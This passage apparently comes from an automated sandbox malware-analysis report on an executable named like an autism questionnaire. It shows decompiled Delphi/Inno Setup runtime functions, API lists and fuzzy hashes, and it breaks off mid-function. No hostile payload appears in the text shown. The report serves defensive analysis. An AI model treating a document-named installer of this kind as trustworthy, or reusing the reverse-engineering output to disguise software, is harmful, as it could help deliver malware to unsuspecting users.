                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$Current$CreateErrorLast
                                                                                              • String ID: 0@G$XtI$l@
                                                                                              • API String ID: 3539746228-385768319
                                                                                              • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                              • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                                              • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                              • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 36%
                                                                                              			E00406424(void* __edx) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v16;
                                                                                              				char* _t23;
                                                                                              				intOrPtr _t29;
                                                                                              				intOrPtr _t39;
                                                                                              				void* _t41;
                                                                                              				void* _t43;
                                                                                              				intOrPtr _t44;
                                                                                              
                                                                                              				_t41 = _t43;
                                                                                              				_t44 = _t43 + 0xfffffff4;
                                                                                              				_v16 = 0;
                                                                                              				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                                                              					L10:
                                                                                              					_v8 = 0x40;
                                                                                              					goto L11;
                                                                                              				} else {
                                                                                              					_t23 =  &_v16;
                                                                                              					_push(_t23);
                                                                                              					_push(0);
                                                                                              					L00403808();
                                                                                              					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_v12 = E004053F0(_v16);
                                                                                              						_push(_t41);
                                                                                              						_push(E004064D2);
                                                                                              						_push( *[fs:edx]);
                                                                                              						 *[fs:edx] = _t44;
                                                                                              						_push( &_v16);
                                                                                              						_push(_v12);
                                                                                              						L00403808();
                                                                                              						_t29 = _v12;
                                                                                              						if(_v16 <= 0) {
                                                                                              							L8:
                                                                                              							_pop(_t39);
                                                                                              							 *[fs:eax] = _t39;
                                                                                              							_push(E004064D9);
                                                                                              							return E0040540C(_v12);
                                                                                              						} else {
                                                                                              							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                                                              								_t29 = _t29 + 0x18;
                                                                                              								_v16 = _v16 - 0x18;
                                                                                              								if(_v16 > 0) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									goto L8;
                                                                                              								}
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                                                              							E00407210();
                                                                                              							L11:
                                                                                              							return _v8;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L12:
                                                                                              			}

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                                              • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                              • API String ID: 4275029093-79381301
                                                                                              • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                              • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                                              • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                              • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 43%
                                                                                              			E004076B8(void* __ecx) {
                                                                                              				long _v4;
                                                                                              				void* _t3;
                                                                                              				void* _t9;
                                                                                              
                                                                                              				if( *0x4bb058 == 0) {
                                                                                              					if( *0x4b7032 == 0) {
                                                                                              						_push(0);
                                                                                              						_push("Error");
                                                                                              						_push("Runtime error     at 00000000");
                                                                                              						_push(0);
                                                                                              						L00403780();
                                                                                              					}
                                                                                              					return _t3;
                                                                                              				} else {
                                                                                              					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
                                                                                              						 *0x4bb35c();
                                                                                              					}
                                                                                              					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                                                              					_t9 = E00408240(0x40774c);
                                                                                              					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                                                              				}
                                                                                              			}







                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 3320372497-2970929446
                                                                                              • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                              • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                                              • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                              • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00420524(void* __ebx, void* __esi) {
                                                                                              				intOrPtr _t4;
                                                                                              				intOrPtr _t6;
                                                                                              
                                                                                              				if(E0041FF68(6, 0) == 0) {
                                                                                              					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
                                                                                              					 *0x4be914 = _t4;
                                                                                              					 *0x4be910 = E00420428;
                                                                                              					return _t4;
                                                                                              				} else {
                                                                                              					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
                                                                                              					 *0x4be910 = _t6;
                                                                                              					return _t6;
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                                              • API String ID: 1883125708-3870080525
                                                                                              • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                              • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                                              • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                              • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 77%
                                                                                              			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                                                              				char _v260;
                                                                                              				char _v768;
                                                                                              				char _v772;
                                                                                              				short* _v776;
                                                                                              				intOrPtr _v780;
                                                                                              				char _v784;
                                                                                              				signed int _v788;
                                                                                              				signed short* _v792;
                                                                                              				char _v796;
                                                                                              				char _v800;
                                                                                              				intOrPtr* _v804;
                                                                                              				signed short* _v808;
                                                                                              				void* __ebp;
                                                                                              				signed char _t55;
                                                                                              				signed int _t64;
                                                                                              				void* _t72;
                                                                                              				intOrPtr* _t83;
                                                                                              				void* _t103;
                                                                                              				void* _t105;
                                                                                              				void* _t108;
                                                                                              				void* _t109;
                                                                                              				intOrPtr* _t118;
                                                                                              				void* _t122;
                                                                                              				intOrPtr _t123;
                                                                                              				char* _t124;
                                                                                              				void* _t125;
                                                                                              
                                                                                              				_t110 = __ecx;
                                                                                              				_v780 = __ecx;
                                                                                              				_v808 = __edx;
                                                                                              				_v776 = __eax;
                                                                                              				if((_v808[0] & 0x00000020) == 0) {
                                                                                              					E00428FDC(0x80070057);
                                                                                              				}
                                                                                              				_t55 =  *_v808 & 0x0000ffff;
                                                                                              				if((_t55 & 0x00000fff) != 0xc) {
                                                                                              					_push(_v808);
                                                                                              					_push(_v776);
                                                                                              					L00427254();
                                                                                              					return E00428FDC(_v776);
                                                                                              				} else {
                                                                                              					if((_t55 & 0x00000040) == 0) {
                                                                                              						_v792 = _v808[4];
                                                                                              					} else {
                                                                                              						_v792 =  *(_v808[4]);
                                                                                              					}
                                                                                              					_v788 =  *_v792 & 0x0000ffff;
                                                                                              					_t103 = _v788 - 1;
                                                                                              					if(_t103 < 0) {
                                                                                              						L9:
                                                                                              						_push( &_v772);
                                                                                              						_t64 = _v788;
                                                                                              						_push(_t64);
                                                                                              						_push(0xc);
                                                                                              						L00427828();
                                                                                              						_t123 = _t64;
                                                                                              						if(_t123 == 0) {
                                                                                              							E00428D34(_t110);
                                                                                              						}
                                                                                              						E00429278(_v776);
                                                                                              						 *_v776 = 0x200c;
                                                                                              						 *((intOrPtr*)(_v776 + 8)) = _t123;
                                                                                              						_t105 = _v788 - 1;
                                                                                              						if(_t105 < 0) {
                                                                                              							L14:
                                                                                              							_t107 = _v788 - 1;
                                                                                              							if(E00429294(_v788 - 1, _t125) != 0) {
                                                                                              								L00427840();
                                                                                              								E00428FDC(_v792);
                                                                                              								L00427840();
                                                                                              								E00428FDC( &_v260);
                                                                                              								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                              							}
                                                                                              							_t72 = E004292C4(_t107, _t125);
                                                                                              						} else {
                                                                                              							_t108 = _t105 + 1;
                                                                                              							_t83 =  &_v768;
                                                                                              							_t118 =  &_v260;
                                                                                              							do {
                                                                                              								 *_t118 =  *_t83;
                                                                                              								_t118 = _t118 + 4;
                                                                                              								_t83 = _t83 + 8;
                                                                                              								_t108 = _t108 - 1;
                                                                                              							} while (_t108 != 0);
                                                                                              							do {
                                                                                              								goto L14;
                                                                                              							} while (_t72 != 0);
                                                                                              							return _t72;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t109 = _t103 + 1;
                                                                                              						_t122 = 0;
                                                                                              						_t124 =  &_v772;
                                                                                              						do {
                                                                                              							_v804 = _t124;
                                                                                              							_push(_v804 + 4);
                                                                                              							_t23 = _t122 + 1; // 0x1
                                                                                              							_push(_v792);
                                                                                              							L00427830();
                                                                                              							E00428FDC(_v792);
                                                                                              							_push( &_v784);
                                                                                              							_t26 = _t122 + 1; // 0x1
                                                                                              							_push(_v792);
                                                                                              							L00427838();
                                                                                              							E00428FDC(_v792);
                                                                                              							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                              							_t122 = _t122 + 1;
                                                                                              							_t124 = _t124 + 8;
                                                                                              							_t109 = _t109 - 1;
                                                                                              						} while (_t109 != 0);
                                                                                              						goto L9;
                                                                                              					}
                                                                                              				}
                                                                                              			}






























                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                              • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                                              • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                              • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				void* _t24;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t31;
                                                                                              				void* _t32;
                                                                                              				intOrPtr _t35;
                                                                                              
                                                                                              				_t32 = __esi;
                                                                                              				_t31 = __edi;
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_t24 = __eax;
                                                                                              				_push(_t35);
                                                                                              				_push(0x4aface);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t35;
                                                                                              				if(( *0x4c1d61 & 0x00000001) == 0) {
                                                                                              					E00407A20( &_v8);
                                                                                              				} else {
                                                                                              					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
                                                                                              				}
                                                                                              				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the 
default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
                                                                                              				_push(_v8);
                                                                                              				_push(_t24);
                                                                                              				_push(0x4b0f94);
                                                                                              				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
                                                                                              				E004087C4( &_v12, _t24, 5, _t31, _t32);
                                                                                              				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
                                                                                              				_pop(_t28);
                                                                                              				 *[fs:eax] = _t28;
                                                                                              				_push(E004AFAD5);
                                                                                              				return E00407A80( &_v12, 2);
                                                                                              			}


                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                              Strings
                                                                                              • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                                              • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                                              • Setup, xrefs: 004AFA9E
                                                                                              • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                                              • API String ID: 2030045667-3391638011
                                                                                              • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                              • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                                              • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                              • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                                                              				signed int _v8;
                                                                                              				signed char _v9;
                                                                                              				signed int _v12;
                                                                                              				signed int _v14;
                                                                                              				void* _v20;
                                                                                              				void* _v24;
                                                                                              				signed short* _v28;
                                                                                              				signed short* _v32;
                                                                                              				signed int _v48;
                                                                                              				void* __ebx;
                                                                                              				void* __ebp;
                                                                                              				signed int _t150;
                                                                                              				signed int _t272;
                                                                                              				intOrPtr _t328;
                                                                                              				intOrPtr _t331;
                                                                                              				intOrPtr _t339;
                                                                                              				intOrPtr _t347;
                                                                                              				intOrPtr _t355;
                                                                                              				void* _t360;
                                                                                              				void* _t362;
                                                                                              				intOrPtr _t363;
                                                                                              
                                                                                              				_t367 = __fp0;
                                                                                              				_t358 = __edi;
                                                                                              				_t360 = _t362;
                                                                                              				_t363 = _t362 + 0xffffffd4;
                                                                                              				_v8 = __ecx;
                                                                                              				_v32 = __edx;
                                                                                              				_v28 = __eax;
                                                                                              				_v9 = 1;
                                                                                              				_t272 =  *_v28 & 0x0000ffff;
                                                                                              				if((_t272 & 0x00000fff) >= 0x10f) {
                                                                                              					_t150 =  *_v32 & 0x0000ffff;
                                                                                              					if(_t150 != 0) {
                                                                                              						if(_t150 != 1) {
                                                                                              							if(E00430860(_t272,  &_v20) != 0) {
                                                                                              								_push( &_v14);
                                                                                              								_t273 =  *_v20;
                                                                                              								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
                                                                                              									_t275 =  *_v32 & 0x0000ffff;
                                                                                              									if(( *_v32 & 0xfff) >= 0x10f) {
                                                                                              										if(E00430860(_t275,  &_v24) != 0) {
                                                                                              											_push( &_v12);
                                                                                              											_t276 =  *_v24;
                                                                                              											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                                                              												E00428BF0(0xb);
                                                                                              												goto L41;
                                                                                              											} else {
                                                                                              												if(( *_v28 & 0x0000ffff) == _v12) {
                                                                                              													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
                                                                                              													goto L41;
                                                                                              												} else {
                                                                                              													_push( &_v48);
                                                                                              													L00427244();
                                                                                              													_push(_t360);
                                                                                              													_push(0x42fdb0);
                                                                                              													_push( *[fs:eax]);
                                                                                              													 *[fs:eax] = _t363;
                                                                                              													_t289 = _v12 & 0x0000ffff;
                                                                                              													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                              													if((_v48 & 0x0000ffff) != _v12) {
                                                                                              														E00428AF8(_t289);
                                                                                              													}
                                                                                              													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
                                                                                              													_pop(_t328);
                                                                                              													 *[fs:eax] = _t328;
                                                                                              													_push(0x42fde5);
                                                                                              													return E00429278( &_v48);
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											E00428BF0(0xb);
                                                                                              											goto L41;
                                                                                              										}
                                                                                              									} else {
                                                                                              										_push( &_v48);
                                                                                              										L00427244();
                                                                                              										_push(_t360);
                                                                                              										_push(0x42fcf7);
                                                                                              										_push( *[fs:eax]);
                                                                                              										 *[fs:eax] = _t363;
                                                                                              										_t294 =  *_v32 & 0x0000ffff;
                                                                                              										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                              										if(( *_v32 & 0x0000ffff) != _v48) {
                                                                                              											E00428AF8(_t294);
                                                                                              										}
                                                                                              										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
                                                                                              										_pop(_t331);
                                                                                              										 *[fs:eax] = _t331;
                                                                                              										_push(0x42fde5);
                                                                                              										return E00429278( &_v48);
                                                                                              									}
                                                                                              								} else {
                                                                                              									if(( *_v32 & 0x0000ffff) == _v14) {
                                                                                              										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
                                                                                              										goto L41;
                                                                                              									} else {
                                                                                              										_push( &_v48);
                                                                                              										L00427244();
                                                                                              										_push(_t360);
                                                                                              										_push(0x42fc52);
                                                                                              										_push( *[fs:eax]);
                                                                                              										 *[fs:eax] = _t363;
                                                                                              										_t299 = _v14 & 0x0000ffff;
                                                                                              										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
                                                                                              										if((_v48 & 0x0000ffff) != _v14) {
                                                                                              											E00428AF8(_t299);
                                                                                              										}
                                                                                              										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
                                                                                              										_pop(_t339);
                                                                                              										 *[fs:eax] = _t339;
                                                                                              										_push(0x42fde5);
                                                                                              										return E00429278( &_v48);
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								E00428BF0(__ecx);
                                                                                              								goto L41;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_v9 = E0042F550(_v8, 2);
                                                                                              							goto L41;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v9 = E0042F53C(0, 1);
                                                                                              						goto L41;
                                                                                              					}
                                                                                              				} else {
                                                                                              					if(_t272 != 0) {
                                                                                              						if(_t272 != 1) {
                                                                                              							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
                                                                                              								_push( &_v12);
                                                                                              								_t282 =  *_v24;
                                                                                              								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                                                              									_push( &_v48);
                                                                                              									L00427244();
                                                                                              									_push(_t360);
                                                                                              									_push(0x42fb63);
                                                                                              									_push( *[fs:eax]);
                                                                                              									 *[fs:eax] = _t363;
                                                                                              									_t306 =  *_v28 & 0x0000ffff;
                                                                                              									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
